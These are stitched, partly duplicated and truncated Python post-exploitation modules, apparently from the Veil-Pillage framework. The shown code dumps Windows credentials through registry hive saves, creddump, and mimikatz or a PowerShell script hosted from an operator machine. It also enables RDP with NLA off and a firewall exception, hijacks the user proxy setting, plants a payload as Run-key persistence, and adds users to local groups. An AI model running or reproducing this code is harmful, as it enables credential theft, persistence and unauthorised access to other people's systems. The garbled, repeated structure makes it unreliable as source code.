    force_method "binary"/"powershell" fixes the path; anything else probes
    PowerShell with a `$a=42;$a` one-liner.  The PowerShell path hosts
    data/misc/autograb.ps1 and collects out_file; the binary path saves the
    SYSTEM/SECURITY/SAM hives to C:\\Windows\\Temp\\, downloads them to /tmp,
    runs creddump over them, then hosts the arch-matched mimikatz binary.
    Parsed results are merged into per-type lists and summarised at the end
    of self.output.  `delay` is a string and is converted with int().

    Artifacts left on the target by the binary path: the three hive copies
    under C:\\Windows\\Temp\\ are fetched with delete=False and nothing is
    added to self.cleanup for them.  Status lines include the password in
    plaintext.
    """
    # assume single set of credentials for this module
    username, password = self.creds[0]
    lhost = self.required_options["lhost"][0]
    use_ssl = self.required_options["use_ssl"][0]
    force_method = self.required_options["force_method"][0]
    delay = self.required_options["delay"][0]
    out_file = self.required_options["out_file"][0]
    # let's keep track of all credentials found
    allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], []
    for target in self.targets:
        powershellInstalled = False
        # check if we're forcing a particular grab method
        if force_method.lower() == "binary":
            powershellInstalled = False
        elif force_method.lower() == "powershell":
            powershellInstalled = True
        else:
            # check if we have a functional Powershell installation
            # (trigger method is hard-coded to "wmis" throughout this module)
            powershellCommand = 'powershell.exe -c "$a=42;$a"'
            powershellResult = command_methods.executeResult(target, username, password, powershellCommand, "wmis")
            if powershellResult.strip() == "42":
                powershellInstalled = True
        if powershellInstalled:
            # do powersploit combined file of invoke-mimikatz and powerdump
            print helpers.color("\n [*] Powershell installed on " + target)
            self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n"
            # the temporary output file we will write to
            # (out_file is rewritten in place; once it contains a backslash
            # later targets reuse the same prefixed path)
            if "\\" not in out_file:
                # otherwise assume it's an absolute path
                out_file = "C:\\Windows\\Temp\\" + out_file
            # path to the combined Invoke-Mimikatz/powerdump powershell script
            secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1"
            # trigger the powershell download on just this target
            delivery_methods.powershellHostTrigger(
                target, username, password, secondStagePath, lhost, "",
                triggerMethod="winexe", outFile=out_file, ssl=use_ssl, noArch=True,
            )
            print "\n [*] Waiting " + delay + "s for Autograb to run..."
            time.sleep(int(delay))
            # grab the output file and delete it
            out = smb.getFile(target, username, password, out_file, delete=True)
            # save the file off to the appropriate location (written even if empty)
            saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out)
            # parse the mimikatz output and append it to our globals
            (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
            allmsv.extend(msv1_0)
            allkerberos.extend(kerberos)
            allwdigest.extend(wdigest)
            alltspkg.extend(tspkg)
            # parse the powerdump component
            hashes = helpers.parseHashdump(out)
            allhashes.extend(hashes)
            if out != "":
                self.output += (
                    "[*] Autograb.ps1 results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
                )
            else:
                self.output += (
                    "[!] Autograb.ps1 failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
                )
        else:
            # do reg.exe for hashdump and host/execute for mimikatz
            print helpers.color("\n [!] Powershell not installed on " + target, warning=True)
            print helpers.color("\n [*] Using reg.exe save method for hash dumping on " + target)
            self.output += "[!] Powershell not installed on " + target + "\n"
            # reg.exe command to save off the hives
            regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"
            # execute the registry save command (fire-and-forget: executeCommand, no result)
            command_methods.executeCommand(target, username, password, regSaveCommand, "wmis")
            print helpers.color("\n [*] Dumping hashes on " + target)
            # sleep for 5 seconds to let everything backup
            time.sleep(5)
            # grab all of the backed up files (delete=False: the copies stay on the target)
            systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False)
            securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False)
            samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False)
            # more error-checking here?
            # NOTE(review): in each empty branch the message interpolates the
            # (empty) file contents rather than the path, so it reads
            # "File '' from ...".  The local files are opened without a
            # context manager and in text mode ("w").
            if systemFile == "":
                self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
            else:
                f = open("/tmp/system", "w")
                f.write(systemFile)
                f.close()
            if securityFile == "":
                self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
            else:
                f = open("/tmp/security", "w")
                f.write(securityFile)
                f.close()
            if samFile == "":
                self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
            else:
                f = open("/tmp/sam", "w")
                f.write(samFile)
                f.close()
            # get all the hashes from these hives
            # NOTE(review): this runs even when the downloads above were empty,
            # so it operates on whatever /tmp/system and /tmp/sam already hold
            # (possibly from a previous target or run).
            out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")
            # save the output file off
            saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out)
            self.output += (
                "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n"
            )
            # save these off to the universal list
            hashes = helpers.parseHashdump(out)
            allhashes.extend(hashes)
            # now, detect the architecture
            archCommand = "echo %PROCESSOR_ARCHITECTURE%"
            archResult = command_methods.executeResult(target, username, password, archCommand, "wmis")
            # anything containing "64" is treated as x64, everything else as x86
            arch = "x86"
            if "64" in archResult:
                arch = "x64"
            # now time for ze mimikatz!
            mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"
            # the temporary output file we will write to
            if "\\" not in out_file:
                # otherwise assume it's an absolute path
                out_file = "C:\\Windows\\Temp\\" + out_file
            exeArgs = '"sekurlsa::logonPasswords full" "exit" >' + out_file
            # host mimikatz.exe and trigger it ONLY on this particular machine
            # so we can get the architecture correct
            delivery_methods.hostTrigger(
                target, username, password, mimikatzPath, lhost, triggerMethod="wmis", exeArgs=exeArgs
            )
            print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
            time.sleep(int(delay))
            # grab the output file and delete it
            out = smb.getFile(target, username, password, out_file, delete=True)
            # parse the mimikatz output and append it to our globals
            (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
            allmsv.extend(msv1_0)
            allkerberos.extend(kerberos)
            allwdigest.extend(wdigest)
            alltspkg.extend(tspkg)
            # save the file off to the appropriate location (written even if empty)
            saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)
            if out != "":
                self.output += (
                    "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
                )
            else:
                self.output += (
                    "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
                )
    # de-duplicate and sort each aggregate list before summarising it
    if len(allhashes) > 0:
        allhashes = sorted(set(allhashes))
        self.output += "[*] All unique hashes:\n\t" + "\n\t".join(allhashes) + "\n"
    if len(allmsv) > 0:
        allmsv = sorted(set(allmsv))
        self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
    if len(allkerberos) > 0:
        allkerberos = sorted(set(allkerberos))
        self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n"
    if len(allwdigest) > 0:
        allwdigest = sorted(set(allwdigest))
        self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n"
    if len(alltspkg) > 0:
        alltspkg = sorted(set(alltspkg))
        self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self):
    """Enable RDP on each target, then disable NLA, then open the firewall.

    Reads the first credential pair from self.creds and the trigger method
    from required_options["trigger_method"].  The three commands run in
    sequence and each later step is attempted only if the previous one
    reported "The operation completed successfully".  Only the RDP enable is
    reversed by the self.cleanup entry (fDenyTSConnections back to 1); the
    NLA change (UserAuthentication=0) and the firewall exception are not
    restored by anything in this module.  Status lines in self.output
    include the password in plaintext.
    """
    # assume single set of credentials (take the first one)
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    # enable RDP command
    rdpCMD = 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
    # cleanup RDP command
    rdpCleanupCMD = 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f'
    # Disable NLA command (no matching cleanup command is defined)
    nlaCMD = 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f'
    # Firewall exception command (no matching cleanup command is defined)
    firewallCMD = "netsh firewall set service type = remotedesktop mod = enable"
    for target in self.targets:
        # execute the RDP enable command and get the result
        rdpResult = command_methods.executeResult(target, username, password, rdpCMD, triggerMethod)
        if rdpResult == "":
            self.output += (
                "[!] No result file, RDP enable failed using creds '" + username + ":" + password + "' on : " + target + "\n"
            )
        elif "The operation completed successfully" in rdpResult:
            self.output += (
                "[*] RDP successfully enabled using creds '" + username + ":" + password + "' on : " + target + "\n"
            )
            # our cleanup is to execute the RDP disable command
            self.cleanup += (
                "executeCommand|" + target + "|" + username + "|" + password + "|" + rdpCleanupCMD + "|" + triggerMethod + "\n"
            )
            # if we succeed here, keep going...
            # execute the disable NLA command
            nlaResult = command_methods.executeResult(target, username, password, nlaCMD, triggerMethod)
            if nlaResult == "":
                self.output += (
                    "[!] No result file, NLA disable failed using creds '" + username + ":" + password + "' on : " + target + "\n"
                )
            elif "The operation completed successfully" in nlaResult:
                self.output += (
                    "[*] NLA successfully disabled using creds '" + username + ":" + password + "' on : " + target + "\n"
                )
                # more success, keep going again...
                # execute the firewall exception command
                firewallResult = command_methods.executeResult(
                    target, username, password, firewallCMD, triggerMethod
                )
                # netsh reports differently from reg.exe, hence the different marker
                # ("exeception" below is the original message text)
                if firewallResult == "":
                    self.output += (
                        "[!] No result file, firewall exeception failed using creds '" + username + ":" + password + "' on : " + target + "\n"
                    )
                elif "executed successfully" in firewallResult:
                    self.output += (
                        "[*] Firewall exception successfully enabled using creds '" + username + ":" + password + "' on : " + target + "\n"
                    )
                else:
                    self.output += (
                        "[!] Error in enabling firewall exception using creds '" + username + ":" + password + "' on : " + target + "\n"
                    )
            else:
                self.output += (
                    "[!] Error in disabling NLA using creds '" + username + ":" + password + "' on : " + target + "\n"
                )
        else:
            self.output += (
                "[!] Error in enabling RDP using creds '" + username + ":" + password + "' on : " + target + "\n"
            )
def run(self):
    """Point the per-user WinINet proxy (HKCU ... Internet Settings) at proxyUrl.

    Reads the first credential pair from self.creds and the "trigger_method"
    and "proxy_url" required options.  For each target the current
    ProxyEnable value is queried and one of three branches runs: value absent
    (enable + set, cleanup deletes both values), 0x0 (enable + set, cleanup
    restores ProxyEnable=0 and the previously found ProxyServer), or 0x1
    (set only, cleanup restores the previous ProxyServer).  The previous
    server is recovered with a regex over the space-split reg output; if
    none is found the cleanup writes an empty ProxyServer.

    NOTE(review): HKCU here is the hive of whichever account the remote
    command runs under — presumably the supplied credentials; confirm against
    command_methods.  proxyUrl is embedded unquoted in proxySetCmd, so a
    value with spaces would break the command.  Failures of the enable/set
    steps produce no output line.  Status lines include the password in
    plaintext.
    """
    # assume single set of credentials for this module
    username, password = self.creds[0]
    triggerMethod = self.required_options['trigger_method'][0]
    proxyUrl = self.required_options['proxy_url'][0]
    proxyCheckCmd = "reg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyEnable"
    proxyCheckServerCmd = "reg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer"
    proxyEnableCmd = "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyEnable /t REG_DWORD /d 1 /f"
    proxySetCmd = "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer /t REG_SZ /d %s /f" % (proxyUrl)
    proxy = ""
    for target in self.targets:
        # no trailing newline here; every later message starts with "\n"
        self.output += "[*] Checking proxy settings on %s" % (target)
        results = command_methods.executeResult(target, username, password, proxyCheckCmd, triggerMethod)
        if results == "":
            self.output += "\n[!] No result file, Proxy enable failed using creds '" + username + ":" + password + "' on : " + target + "\n"
        elif "ProxyEnable" not in results:
            # value has never been written: enable, then set, then record a
            # cleanup that deletes both values again
            self.output += "\n[*] Proxy has never been set on " + target
            self.output += "\n[*] Enabling system proxy"
            enable_results = command_methods.executeResult(target, username, password, proxyEnableCmd, triggerMethod)
            if "The operation completed successfully" in enable_results:
                self.output += "\n[*] Proxy successfully enabled on " + target
                self.output += "\n[*] Setting proxy server"
                set_results = command_methods.executeResult(target, username, password, proxySetCmd, triggerMethod)
                if "The operation completed successfully" in set_results:
                    self.output += "\n[*] Proxy address successfully set to %s on %s" % (proxyUrl, target)
                    cleanupCMD = "reg delete \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyEnable /f && reg delete \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer /f"
                    self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
        elif "0x0" in results:
            # proxy disabled: remember the existing server (if any) so cleanup
            # can put it back, then enable and set
            server_results = command_methods.executeResult(target, username, password, proxyCheckServerCmd, triggerMethod)
            proxy = ""
            for res in server_results.split(" "):
                # last token that looks like host:port wins
                r = re.findall(r".+:[0-9]{1,5}", res)
                if r:
                    proxy = r[0]
            if proxy == "":
                self.output += "\n[*] Proxy has been disabled on %s" % (target)
            else:
                self.output += "\n[*] Proxy has been disabled but set to %s on %s" % (proxy, target)
            self.output += "\n[*] Enabling proxy"
            enable_results = command_methods.executeResult(target, username, password, proxyEnableCmd, triggerMethod)
            if "The operation completed successfully" in enable_results:
                self.output += "\n[*] Proxy successfully enabled on " + target
                self.output += "\n[*] Setting proxy server"
                set_results = command_methods.executeResult(target, username, password, proxySetCmd, triggerMethod)
                if "The operation completed successfully" in set_results:
                    self.output += "\n[*] Proxy address successfully set to %s on %s" % (proxyUrl, target)
                    # restores ProxyEnable=0 and the previous ProxyServer ("" if none was found)
                    cleanupCMD = "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyEnable /t REG_DWORD /d 0 /f && reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer /t REG_SZ /d \"%s\" /f" % proxy
                    self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
        elif "0x1" in results:
            # proxy already enabled: only ProxyServer is changed, and only it
            # is restored by cleanup
            server_results = command_methods.executeResult(target, username, password, proxyCheckServerCmd, triggerMethod)
            proxy = ""
            for res in server_results.split(" "):
                r = re.findall(r".+:[0-9]{1,5}", res)
                if r:
                    proxy = r[0]
            if proxy == "":
                self.output += "\n[*] Proxy already enabled on %s" % (target)
            else:
                self.output += "\n[*] Proxy already enabled and set to %s on %s" % (proxy, target)
            self.output += "\n[*] Setting proxy server on " + target
            set_results = command_methods.executeResult(target, username, password, proxySetCmd, triggerMethod)
            if "The operation completed successfully" in set_results:
                self.output += "\n[*] Proxy address successfully set to %s on %s" % (proxyUrl, target)
                cleanupCMD = "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer /t REG_SZ /d \"%s\" /f" % proxy
                self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
        else:
            self.output += "\n[!] Got unexpected output: %s" % results
def run(self):
    """Point the per-user WinINet proxy (HKCU ... Internet Settings) at proxyUrl.

    Reads the first credential pair from self.creds and the "trigger_method"
    and "proxy_url" required options.  For each target the current
    ProxyEnable value is queried and one of three branches runs: value absent
    (enable + set, cleanup deletes both values), 0x0 (enable + set, cleanup
    restores ProxyEnable=0 and the previously found ProxyServer), or 0x1
    (set only, cleanup restores the previous ProxyServer).  The previous
    server is recovered with a regex over the space-split reg output; if
    none is found the cleanup writes an empty ProxyServer.

    NOTE(review): HKCU here is the hive of whichever account the remote
    command runs under — presumably the supplied credentials; confirm against
    command_methods.  proxyUrl is embedded unquoted in proxySetCmd, so a
    value with spaces would break the command.  Failures of the enable/set
    steps produce no output line.  Status lines include the password in
    plaintext.
    """
    # assume single set of credentials for this module
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    proxyUrl = self.required_options["proxy_url"][0]
    proxyCheckCmd = (
        'reg query "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyEnable'
    )
    proxyCheckServerCmd = (
        'reg query "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer'
    )
    proxyEnableCmd = 'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f'
    proxySetCmd = (
        'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer /t REG_SZ /d %s /f' % (proxyUrl)
    )
    proxy = ""
    for target in self.targets:
        # no trailing newline here; every later message starts with "\n"
        self.output += "[*] Checking proxy settings on %s" % (target)
        results = command_methods.executeResult(target, username, password, proxyCheckCmd, triggerMethod)
        if results == "":
            self.output += (
                "\n[!] No result file, Proxy enable failed using creds '" + username + ":" + password + "' on : " + target + "\n"
            )
        elif "ProxyEnable" not in results:
            # value has never been written: enable, then set, then record a
            # cleanup that deletes both values again
            self.output += "\n[*] Proxy has never been set on " + target
            self.output += "\n[*] Enabling system proxy"
            enable_results = command_methods.executeResult(
                target, username, password, proxyEnableCmd, triggerMethod
            )
            if "The operation completed successfully" in enable_results:
                self.output += "\n[*] Proxy successfully enabled on " + target
                self.output += "\n[*] Setting proxy server"
                set_results = command_methods.executeResult(target, username, password, proxySetCmd, triggerMethod)
                if "The operation completed successfully" in set_results:
                    self.output += "\n[*] Proxy address successfully set to %s on %s" % (proxyUrl, target)
                    cleanupCMD = 'reg delete "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyEnable /f && reg delete "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer /f'
                    self.cleanup += (
                        "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
                    )
        elif "0x0" in results:
            # proxy disabled: remember the existing server (if any) so cleanup
            # can put it back, then enable and set
            server_results = command_methods.executeResult(
                target, username, password, proxyCheckServerCmd, triggerMethod
            )
            proxy = ""
            for res in server_results.split(" "):
                # last token that looks like host:port wins
                r = re.findall(r".+:[0-9]{1,5}", res)
                if r:
                    proxy = r[0]
            if proxy == "":
                self.output += "\n[*] Proxy has been disabled on %s" % (target)
            else:
                self.output += "\n[*] Proxy has been disabled but set to %s on %s" % (proxy, target)
            self.output += "\n[*] Enabling proxy"
            enable_results = command_methods.executeResult(
                target, username, password, proxyEnableCmd, triggerMethod
            )
            if "The operation completed successfully" in enable_results:
                self.output += "\n[*] Proxy successfully enabled on " + target
                self.output += "\n[*] Setting proxy server"
                set_results = command_methods.executeResult(target, username, password, proxySetCmd, triggerMethod)
                if "The operation completed successfully" in set_results:
                    self.output += "\n[*] Proxy address successfully set to %s on %s" % (proxyUrl, target)
                    # restores ProxyEnable=0 and the previous ProxyServer ("" if none was found)
                    cleanupCMD = (
                        'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyEnable /t REG_DWORD /d 0 /f && reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer /t REG_SZ /d "%s" /f' % proxy
                    )
                    self.cleanup += (
                        "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
                    )
        elif "0x1" in results:
            # proxy already enabled: only ProxyServer is changed, and only it
            # is restored by cleanup
            server_results = command_methods.executeResult(
                target, username, password, proxyCheckServerCmd, triggerMethod
            )
            proxy = ""
            for res in server_results.split(" "):
                r = re.findall(r".+:[0-9]{1,5}", res)
                if r:
                    proxy = r[0]
            if proxy == "":
                self.output += "\n[*] Proxy already enabled on %s" % (target)
            else:
                self.output += "\n[*] Proxy already enabled and set to %s on %s" % (proxy, target)
            self.output += "\n[*] Setting proxy server on " + target
            set_results = command_methods.executeResult(target, username, password, proxySetCmd, triggerMethod)
            if "The operation completed successfully" in set_results:
                self.output += "\n[*] Proxy address successfully set to %s on %s" % (proxyUrl, target)
                cleanupCMD = (
                    'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" /v ProxyServer /t REG_SZ /d "%s" /f' % proxy
                )
                self.cleanup += (
                    "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
                )
        else:
            self.output += "\n[!] Got unexpected output: %s" % results
def run(self):
    """Dump logon credentials from every target with mimikatz.exe.

    Only the first credential pair in ``self.creds`` is used. Per target the
    processor architecture is probed, the matching mimikatz binary is hosted
    from ``lhost`` and triggered with ``sekurlsa::logonPasswords full``, the
    redirected output is fetched over SMB (and removed from the target),
    parsed, and saved; the de-duplicated credential lists for every SSP are
    appended to ``self.output``.

    NOTE: the result file on the target and ``self.output`` both contain
    plaintext passwords, and ``self.output`` also echoes the credentials used
    to authenticate - handle the module output accordingly.
    """
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    lhost = self.required_options["lhost"][0]
    delay = self.required_options["delay"][0]
    out_file = self.required_options["out_file"][0]

    # a bare filename lands in the (world-writable) Temp directory; anything
    # containing a backslash is treated as an absolute path and used as given
    if "\\" not in out_file:
        out_file = "C:\\Windows\\Temp\\" + out_file

    # plaintext credentials aggregated over all targets, keyed by SSP name
    sspOrder = ("msv1_0", "kerberos", "wdigest", "tspkg")
    found = dict((ssp, []) for ssp in sspOrder)

    for target in self.targets:
        print("\n [*] Executing mimikatz on " + target)

        # the architecture probe doubles as a reachability/credential check
        archResult = command_methods.executeResult(target, username, password, "echo %PROCESSOR_ARCHITECTURE%", triggerMethod)
        if "error" in archResult:
            self.output += "[!] Mimikatz failed for " + target + " : " + archResult + "\n"
            continue

        arch = "x64" if "64" in archResult else "x86"
        mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"
        exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file

        # host the arch-correct binary and run it with the output redirected
        delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod=triggerMethod, exeArgs=exeArgs)

        print("\n [*] Waiting " + delay + "s for Mimikatz to run...")
        time.sleep(int(delay))

        # pull the result back and delete it remotely - it holds plaintext passwords
        out = smb.getFile(target, username, password, out_file, delete=True)

        for ssp, creds in zip(sspOrder, helpers.parseMimikatz(out)):
            found[ssp].extend(creds)

        saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)
        if out != "":
            self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
        else:
            self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"

    # one sorted, de-duplicated section per SSP that yielded anything
    for ssp in sspOrder:
        if len(found[ssp]) > 0:
            self.output += "[*] All " + ssp + ":\n\t" + "\n\t".join(sorted(set(found[ssp]))) + "\n"
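def run(self):
    """Plant a payload .exe in C:\\Windows and register it under HKLM\\...\\Run.

    The payload is either generated through Veil-Evasion (``exe_path`` ==
    ``veil``) or taken from a local path. It is staged locally under
    ``upload_name``, uploaded to ``C:\\Windows\\<upload_name>`` on every
    target and registered as a ``CurrentVersion\\Run`` value named
    ``key_name`` (this is a Run-key persistence, not a sethc/sticky-keys
    backdoor). Cleanup removes the Run value and the dropped binary.

    Returns ``""`` early when no payload could be produced or found.
    """
    import shutil

    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    uploadName = self.required_options["upload_name"][0]
    key_name = self.required_options["key_name"][0]

    if self.required_options["exe_path"][0].lower() == "veil":
        # drive Veil-Evasion for payload generation
        con = controller.Controller()

        if not self.args.p:
            # no payload given on the command line: interactive menu
            payloadPath = con.MainMenu()
        else:
            # build the option dictionary Veil-Evasion expects from -c / msfvenom args
            options = {}
            if self.args.c:
                options['required_options'] = {}
                for option in self.args.c:
                    # split on the first "=" only so values may themselves contain "="
                    name, value = option.split("=", 1)
                    options['required_options'][name] = [value, ""]
            if self.args.msfpayload:
                options['msfvenom'] = [self.args.msfpayload, self.args.msfoptions]

            con.SetPayload(self.args.p, options)
            code = con.GeneratePayload()
            payloadPath = con.OutputMenu(con.payload, code, showTitle=True, interactive=False)

        # Veil-Evasion clears the screen; re-print the banner and module name
        messages.title()
        print(" [*] Executing module: " + helpers.color(self.name) + "...")

        # the user may have backed out of Veil-Evasion without producing anything
        if not payloadPath or payloadPath == "":
            print(helpers.color(" [!] No output from Veil-Evasion", warning=True))
            raw_input("\n [>] Press enter to continue: ")
            return ""
    else:
        # a pre-built .exe supplied by the operator
        payloadPath = self.required_options["exe_path"][0]
        if not os.path.exists(payloadPath):
            print(helpers.color("\n\n [!] Invalid .exe path specified", warning=True))
            raw_input("\n [>] Press enter to continue: ")
            return ""

    if not uploadName.endswith(".exe"):
        uploadName += ".exe"

    # Stage the binary under its upload name. shutil.copy replaces the former
    # os.system("cp ...") so that spaces or shell metacharacters in either
    # path are never handed to a shell.
    stagedPath = "/tmp/" + uploadName
    shutil.copy(payloadPath, stagedPath)

    baseName = payloadPath.split("/")[-1]
    remotePath = "C:\\Windows\\" + uploadName

    runKey = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
    regCommand = "REG ADD \"" + runKey + "\" /f /v " + key_name + " /t REG_SZ /d \"" + remotePath + "\""
    # cleanup: drop the Run value AND the dropped binary, so a cleanup run
    # does not leave the executable behind in C:\Windows
    regCleanupCMD = "REG DELETE \"" + runKey + "\" /v " + key_name + " /f"
    fileCleanupCMD = "del /F /Q \"" + remotePath + "\""

    for target in self.targets:
        # upload via the C$ admin share into C:\Windows\
        smb.uploadFile(target, username, password, "C$", "\\Windows\\", stagedPath)
        self.output += "[*] Binary '" + baseName + "' uploaded to C:\\Windows\\" + uploadName + " using creds '" + username + ":" + password + "' on : " + target + "\n"

        runResult = command_methods.executeResult(target, username, password, regCommand, triggerMethod)

        if runResult == "":
            self.output += "[!] No result file, CurrentVersion\\Run registry command failed using creds '" + username + ":" + password + "' on : " + target + "\n"
        elif "The operation completed successfully" in runResult:
            self.output += "[*] CurrentVersion\\Run successfully set using creds '" + username + ":" + password + "' on : " + target + "\n"
            for cleanupCMD in (regCleanupCMD, fileCleanupCMD):
                self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
        else:
            # reg.exe ran but reported something other than success (e.g. access denied)
            self.output += "[!] CurrentVersion\\Run registry command failed using creds '" + username + ":" + password + "' on : " + target + "\n"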
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] for target in self.targets: userToAdd = self.required_options["user"][0] groupToAdd = self.required_options["localgroup"][0] # command to add the user to the specified localgroup groupAddCommand = "net localgroup " + groupToAdd + " " + userToAdd + " /add" # execute the localgroup add command and get the result groupAddResult = command_methods.executeResult(target, username, password, groupAddCommand, triggerMethod) # check all of our results as appropriate if groupAddResult == "": self.output += ( "[!] No result file, localgroup add '" + userToAdd + " to " + groupToAdd + "' failed using creds '" + username + ":" + password + "' on : " + target + "\n" ) elif "The command completed successfully" in groupAddResult: self.output += ( "[*] User '" + userToAdd + " added to " + groupToAdd + "' successfully using creds '" + username + ":" + password + "' on " + target + "\n" ) # cleanup -> delete the user from the system cleanupCMD = "net localgroup " + groupToAdd + " " + userToAdd + " /delete" self.cleanup += ( "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n" ) else: self.output += ( "[!] Localgroup add '" + userToAdd + " to " + groupToAdd + "' failed using creds '" + username + ":" + password + "' on : " + target + "\n" )
def run(self):
    """Run mimikatz.exe on each target and collect the logon credentials.

    The first credential pair in ``self.creds`` is used throughout. For each
    target the architecture is detected, the matching mimikatz binary is
    hosted from ``lhost`` and executed with ``sekurlsa::logonPasswords
    full``, and the redirected output file is downloaded (and deleted on the
    target), parsed and saved. Unique credentials per SSP are summarised at
    the end of ``self.output``.

    NOTE: both the remote result file and ``self.output`` carry plaintext
    passwords, and ``self.output`` also repeats the credentials used to
    authenticate.
    """
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    lhost = self.required_options["lhost"][0]
    delay = self.required_options["delay"][0]
    out_file = self.required_options["out_file"][0]

    # relative names go to the Temp directory; a backslash means "absolute path, use as-is"
    if "\\" not in out_file:
        out_file = "C:\\Windows\\Temp\\" + out_file

    allmsv = []
    allkerberos = []
    allwdigest = []
    alltspkg = []

    for target in self.targets:
        print("\n [*] Executing mimikatz on " + target)

        # probe the architecture first; any execution error here skips the target
        archResult = command_methods.executeResult(target, username, password, "echo %PROCESSOR_ARCHITECTURE%", triggerMethod)
        if "error" in archResult:
            self.output += "[!] Mimikatz failed for " + target + " : " + archResult + "\n"
            continue

        if "64" in archResult:
            arch = "x64"
        else:
            arch = "x86"

        mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"
        exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file

